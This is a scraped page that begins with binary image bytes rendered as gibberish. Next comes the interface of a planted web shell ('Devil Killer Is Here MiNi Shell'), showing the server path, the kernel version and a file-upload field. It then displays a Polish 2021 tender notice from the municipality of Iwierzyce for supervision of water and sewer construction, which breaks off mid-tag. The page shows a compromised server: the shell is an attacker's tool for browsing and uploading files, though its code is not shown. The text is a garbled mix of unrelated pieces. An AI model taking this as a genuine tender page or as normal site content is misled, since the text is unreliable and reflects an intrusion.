JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211230/0033779001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Iwierzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Iwierzyce 80</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iwierzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-124</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(17)745 59 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@iwierzyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.iwierzyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a70dc063-694c-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00337790</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002365/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https//przetargi.iwierzyce.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.iwierzyce.pl , www.bip.iwierzyce.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, <br/>a Wykonawcami odbywa się przy użyciu Platformy Zamówień Publicznych ZETO PZP.<br/>Uwaga! Przed przystąpieniem do składania oferty, Wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej. <br/>2) Zamawiający w sytuacjach awaryjnych może również komunikować się z Wykonawcami za pomocą poczty elektronicznej: przetargi@iwierzyce.pl.<br/>3) Na Platformie postępowanie prowadzone jest pod nazwą: Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych oraz instrukcja składania ofert i sposobu komunikowania się Zamawiającego z Wykonawcami, jest dostępna jest na stronie dotyczącej prowadzonego postępowania.<br/>5) Postępowanie dostępne jest pod adresem: https://przetargi.iwierzyce.pl<br/>6) Osobami uprawnionymi do kontaktu z Wykonawcami są: <br/>W zakresie proceduralnym: Paulina Adamska <br/>W zakresie merytorycznym: Szymon Pazdan<br/>7) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>8) Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania. <br/>9) W przypadku braku potwierdzenia otrzymania korespondencji przez Wykonawcę, Zamawiający domniema, że oświadczenia, wnioski, zawiadomienia oraz informacje wysłane przez Zamawiającego na adres Platformy lub adres e-mail podany przez Wykonawcę, zostały doręczone w sposób umożliwiający zapoznanie się z ich treścią.<br/>10) SWZ wraz załącznikami została opublikowana na stronie Urzędu Gminy: www.bip.iwierzyce.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informacje dotyczące administratora danych<br/>Administratorem Państwa danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będzie Gmina Iwierzyce, Iwierzyce 80, <br/>39 -124 Iwierzyce, reprezentowana przez Wójta, który wykonuje swoje zadania przy pomocy Urzędu Gminy w Iwierzycach.<br/><br/>2. Inspektor ochrony danych<br/>Wyznaczyliśmy inspektora ochrony danych – adw. Jakub Curzytek. Jest to osoba, z którą mogą <br/>się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. Z inspektorem ochrony danych mogą się Państwo kontaktować w następujący sposób poprzez:<br/>1) e-mail: kancelaria@adwokatcurzytek.pl<br/>2) telefonicznie: 692616480<br/><br/>3. Cel przetwarzania Państwa danych oraz podstawy prawne<br/>Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku <br/>z ustawą z dnia 11 września 2019 r. prawo zamówień publicznych (dalej – ustawa PZP) w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonego <br/>z zastosowaniem przepisów ustawy PZP.<br/><br/>4. Okres przechowywania danych<br/>Dane osobowe będą przechowywane przez okres prowadzenia postępowania w zakresie udzielenia zamówienia, a następnie dla celów archiwalnych przez okres wynikający<br/> z przepisów kancelaryjno–archiwalnych obowiązujących administratora.<br/><br/>5. Komu przekazujemy Państwa dane?<br/>Odbiorcami danych osobowych będą:<br/>•	osoby i podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie ustawy PZP<br/>•	podmioty, które na podstawie stosownych umów zawartych z administratorem świadczą na jego rzecz usługi np. serwisowe, informatyczne, a także podmiot zapewniający obsługę procesu udzielania zamówień publicznych za pośrednictwem centralnej platformy zakupowej.<br/> <br/>6. Przysługujące Państwu uprawnienia związane z przetwarzaniem danych osobowych<br/>W związku z przetwarzaniem danych osobowych przysługują Pani/Panu następujące uprawnienia: <br/>- prawo dostępu do danych osobowych, <br/>- prawo do usunięcia danych osobowych,<br/>- prawo do żądania sprostowania danych osobowych, z tym że, skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą,<br/>- prawo do żądania ograniczenia przetwarzania danych osobowych, z tym że w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania,<br/>- prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku gdy uzna Pan/Pani że przetwarzanie Pani/Pana danych osobowych jest niezgodne z prawem.<br/><br/>7. Obowiązek podania danych<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym wynikającym z ustawy PZP i konieczne do przystąpienia do postępowania. Konsekwencje niepodania danych osobowych wynikają z przepisów ustawy PZP i może nią być brak możliwości udziału w postępowaniu i odrzucenie oferty.<br/><br/>8. Przetwarzanie danych<br/>W odniesieniu do przekazanych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO ani nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BID.271.7.2021.PA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 216956,91 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce.<br/><br/>Zamówienie obejmuje sprawowanie nadzoru inwestorskiego nad niżej wymienionymi zadaniami inwestycyjnymi. Wykonawca powinien posiadać uprawnienia w branży sanitarnej w pełnym zakresie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz w branży instalacyjnej, posiadając uprawnienia w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2019, poz. 1186) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) albo odpowiadające im ważne uprawienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie funkcję Inspektora Nadzoru w zakresie niniejszego zamówienia.<br/><br/>2. Zakres robót budowlanych obejmuje:<br/><br/>1) Budowę kanalizacji sanitarnej tłocznej i grawitacyjnej wraz z przepompowniami i przyłączami we wsi Nockowa<br/><br/>Krótki opis przedmiotu zamówienia (OPZ): <br/>Przedmiotem zamówienia jest wykonanie kanalizacji ścieków bytowo-gospodarczych z budownictwa mieszkaniowego, instytucji i zakładów pracy z wyodrębnieniem ścieków pochodzenia zwierzęcego z budynków inwentarskich dla wsi Nockowa<br/>Zakres inwestycji i rozwiązań projektowych dotyczy budowy:<br/>- sieci kanalizacji sanitarnej grawitacyjnej <br/>- pompowni ścieków P1, P2, P3, P4, P5, Pz, oraz modernizacja i przebudowa pompowni na dz.1535/1 Nockowa i pompowni na dz.1018/4 Iwierzyce<br/>- rurociągów tłocznych z ww.<br/>- zasilenia energetycznego pompowni.<br/><br/>2) Budowę sieci wodociągowej wraz z przyłączami wodociągowymi do budynków mieszkalnych w miejscowości Bystrzyca-Sępia<br/><br/>Zakres inwestycji i rozwiązań projektowych obejmuje budowę<br/>- pompowni wody w obudowie kontenerowej z zamontowanym zestawem pompowym, oraz zbiornika wyrównawczego, prefabrykowanego, stalowego, poziomego V = 50 m 3 wraz z niezbędną infrastrukturą do jej funkcjonowania.<br/>- sieci wodociągowej w układzie sieci rozgałęzieniowym wraz z przyłączami.<br/>Zakres projektowanych sieci i obiektów wodociągowych:<br/>- sieci wodociągowej:<br/>Rury PE 100 -RC PN 10 SDR 17, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 110 x 6,6 mm, L = 4 379 mb<br/>Rury PE 100 -RC PN 10 SDR 17, 2-warstwowa ciśnieniowe łączone metodą zgrzewania. 90 x 5,4 mm, L = 1 107,5 mb<br/>Rury PE 100 -RC PN 10 SDR 17, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 63 x 3,8 mm, L = 352,0 mb<br/>Rury PE 100 -RC PN 16 SDR 11, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 110 x 10 mm, L = 448,0 mb<br/>Rury PE 100 -RC PN 16 SDR 11, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 90 x 8,2 mm, L = 193,5 mb<br/>Rury PE 100 -RC PN 16 SDR 11, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 63 x 5,8 mm, L = 61,5 mb<br/>Łącznie 6 840,5 mb<br/><br/>- przyłącza do budynków:<br/>Rury PE 100 -RC PN 10 SDR 17, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 40 x 2,4 mm, L = 1 216 mb<br/>Rury PE 100 -RC PN 16 SDR 11, 2-warstwowa ciśnieniowe łączone metodą zgrzewania 40 x 3,7 mm, L = 211,5 mb<br/>Łącznie 1 427,5 mb<br/><br/>Razem 8 268m<br/><br/>3) Budowę sieci wodociągowej i przyłączy wodociągowych w miejscowości Bystrzyca-Wola<br/>Zakres projektowanych obiektów obejmuje budowę:<br/>- sieci wodociągowej:<br/>z rur PE HD 100-RC szereg SDR 17; PN 10 warstwowa, łączonych metodą zgrzewania<br/>fi 110 x 6,6 mm, L = 3 733 m,<br/>fi 63 x 3,8 mm, L = 215 m,<br/>- przyłącza do budynków:<br/>z rur PE HD 100-RC szereg SDR 17; PN 10 warstwowa, łączonych metodą zgrzewania<br/>fi 40 x 2,4 mm, L = 1 052 m,<br/>Łącznie 5 000 mb<br/><br/>4) Budowę sieci wodociągowej i przyłączy wodociągowych w miejscowości Nockowa-Pola:<br/><br/>Zakres inwestycji nie obejmuje całego projektu budowlanego, lecz został graficznie przedstawiony w pliku pod nazwą „Zakres Nockowa”, i według niego należy kalkulować ofertę. Są to działki o nr ewid:<br/>W miejscowości Olchowa: 1694, 1695, 1696, 1697, 1698, 1700, 1702, 1362/4, 1352, 1703;<br/>W miejscowości Nockowa: 231, 1905, 236/1, 236/4, 236/3, 240, 241, 242, 249, 250, 251, 252, 253, 254, 255, 1931, 262, 265, 1932, 264, 323, 266, 267, 268, 272, 322/1, 322/2, 1947, 321, 356, 320/4, 361/1, 360, 319, 318, 317, 372, 273, 274, 277/3, 277/4, 278, 290, 310, 291, 309, 294.<br/>W miejscowości Będziemyśl: 1266, 1265, 1264, 1263, 1133, 1132, 1131, 1130, 1129, 1128, 1089/1, 1089/2, 1088, 1081, 1080, 1079, 1065, 1064, 1063, 1039, 1038, 1037, 1010, 994/2, 994/1, 995, 989, 991, 968, 967, 966, 940/1 <br/>Planowana inwestycja została zaprojektowana w taki sposób, że nie zmieni sposobu użytkowania terenu, ani jego przeznaczenia, nastąpi jedynie zmiana w jego zagospodarowaniu poprzez budowę obiektu liniowego zlokalizowanego na ww. działkach. Projektowaną sieć prowadzono w sposób umożliwiający prawidłowe zagospodarowanie działek, na terenie których jest usytuowana. Inwestycję zaprojektowano i będzie realizowana zgodnie z warunkami określonymi przez dysponenta sieci, warunkami przejścia przez drogę - określonymi przez Zarządcę drogi, oraz zgodnie z obowiązującymi warunkami technicznymi jakim powinny odpowiadać sieci wodociągowe i ich usytuowanie. Inwestycję zaprojektowano i będzie realizowana z uwzględnieniem przebiegu istniejących sieci uzbrojenia terenu. <br/><br/>Zakres projektowanych obiektów obejmuje budowę: <br/>- sieci wodociągowej:<br/>z rur PE HD 100-RC szereg SDR 17; PN 10 warstwowa, łączonych metodą zgrzewania<br/>110 x 6,6 mm, L = 2177,5 m,<br/><br/>63 x 3,8 mm, L = 226,0 m<br/><br/>z rur PE HD 100-RC szereg SDR 11; PN 16 warstwowa, łączonych metodą zgrzewania<br/>110 x 10,0 mm, L = 74,0 m, <br/><br/>Łącznie 2477,5 m<br/><br/>5) Budowę sieci kanalizacji sanitarnej i wodociągowej w miejscowości Olchowa Pod Będziemyślem. <br/>Przedmiotem opracowania jest budowa sieci kanalizacji sanitarnej i wodociągowej do budownictwa mieszkaniowego jednorodzinnego wraz z przyłączami do budynków mieszkalnych<br/>Sieć kanalizacyjna:<br/>Kanały zaprojektowano z rur kanalizacyjnych PVC-U, lite z wydłużonym kielichem, typ ciężki klasy &#34;S&#34;, o sztywności obwodowej rury SN 8 kN/<br/>m2:<br/>- kanalizacja sanitarna - rury PVC - U klasy S o przekroju fi 200 mm, L = 2038,5 m,<br/>- przyłącza do budynków - rury PVC - U klasy S o przekroju fi 160 mm, L = 168 m,<br/>Razem 2 206,5m<br/>Sieć wodociągowa:<br/>Rurociągi zaprojektowano z rur PE HD 100-RC PN 10 SDR 17 warstwowa, łączone metodą zgrzewania:<br/>- wodociąg 110 x 6,6 mm, L = 1417,5 m,<br/> 63 x 3,8 mm, L = 88 m,<br/>- przyłącza do budynków - 40 x 2,4 mm, L = 52 m,<br/>Razem 1557,5m<br/><br/>Wykonawca będzie zobowiązany prowadzić nadzór nad robotami, których szczegółowy zakres określa dokumentacja projektowa zamieszczona na stronie internetowej Zamawiającego po linkiem<br/>https://przetargi.iwierzyce.pl/#/offer/a4bd7bab-2259-4306-9aba-38c5ad64cbdb </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przyjmuje dwa kryteria oceny ofert, tj.:<br/>- cena – waga 60%<br/>- doświadczenie zawodowe inspektora nadzoru inwestorskiego branży sanitarnej – 40%<br/><br/>1) W kryterium „cena” (wartość brutto zamówienia) zostanie zastosowany wzór:<br/>Ocena cena [C] = [cena oferowana minimalna : cena badanej oferty] x 60 pkt <br/><br/>2) Opis sposobu oceny ofert w kryterium doświadczenie inspektora nadzoru inwestorskiego w branży sanitarnej<br/><br/>Zgodnie z przepisem art. 242 ust. 2 pkt 5 ustawy Pzp Zamawiający ustanawia kryterium doświadczenie osób skierowanych przez Wykonawcę do realizacji zamówienia, tj. inspektora nadzoru branży sanitarnej.<br/><br/>Liczba punktów przyznana badanej ofercie za doświadczenie zawodowe inspektora nadzoru inwestorskiego branży sanitarnej do realizacji zamówienia:<br/><br/>- jedno zadanie dot. robót budowlanych polegających na budowie i/lub przebudowie sieci kanalizacji sanitarnej (o wartości min. 2 000 000,00 zł) i jedno zadanie polegające budowie i/lub przebudowie sieci wodociągowej (o wartości min. 1 000 000,00 zł) – otrzyma 0 pkt<br/><br/>- dwa zadania dot. robót budowlanych polegających na budowie i/lub przebudowie sieci kanalizacji sanitarnej (o wartości min. 2 000 000,00 zł) i dwa zadania polegające na budowie i/lub przebudowie sieci wodociągowej (o wartości min. 1 000 000,00 zł) – otrzyma 20 pkt<br/><br/>- trzy zadania dot. robót budowlanych polegających na budowie i/lub przebudowie sieci kanalizacji sanitarnej (o wartości min. 2 000 000,00 zł) i trzy zadania polegające na budowie i/lub przebudowie sieci wodociągowej (o wartości min. 1 000 000,00 zł) – otrzyma 40 pkt<br/><br/>Maksymalna ilość punktów, jaką może otrzymać oferta Wykonawcy w tym kryterium wynosi 40 pkt.<br/><br/><br/>UWAGA! Jeżeli Wykonawca nie wskaże doświadczenia Wykonawcy, Zamawiający uzna, że Wykonawca w ogóle nie ma doświadczenia i ofertę odrzuci.<br/><br/>Łączna punktacja = C+D<br/><br/>Oferty oceniane będą punktowo. Maksymalna ilość punktów, wynosi 100 pkt.<br/>Ocena punktowa oferty będzie zaokrąglona do dwóch miejsc po przecinku.<br/><br/>2. O wyborze oferty zamawiający zawiadamia niezwłocznie wykonawców, którzy ubiegali się <br/>o udzielenie zamówienia.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów uzyskanych w w/w kryteriach. <br/>4. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>5. Zgodnie z art. 223 ustawy Pzp, w toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 